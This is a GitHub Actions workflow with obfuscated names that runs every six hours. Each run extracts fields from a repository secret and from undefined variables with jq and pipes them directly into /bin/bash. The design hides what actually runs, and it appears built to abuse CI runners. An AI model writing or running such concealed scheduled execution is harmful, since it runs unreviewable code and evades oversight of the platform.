name: meihaxi2513

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meihaxi2513
        env:
          m053: ${{ secrets.m053 }}
        run: |
          echo $m053 | jq -r .cr1 | /bin/bash
          echo $ncs8 | jq -r .jqswa42409 | /bin/bash
          echo $axi5 | jq -r .msob84435 | /bin/bash
          echo $y9733 | jq -r .ien8375 | /bin/bash

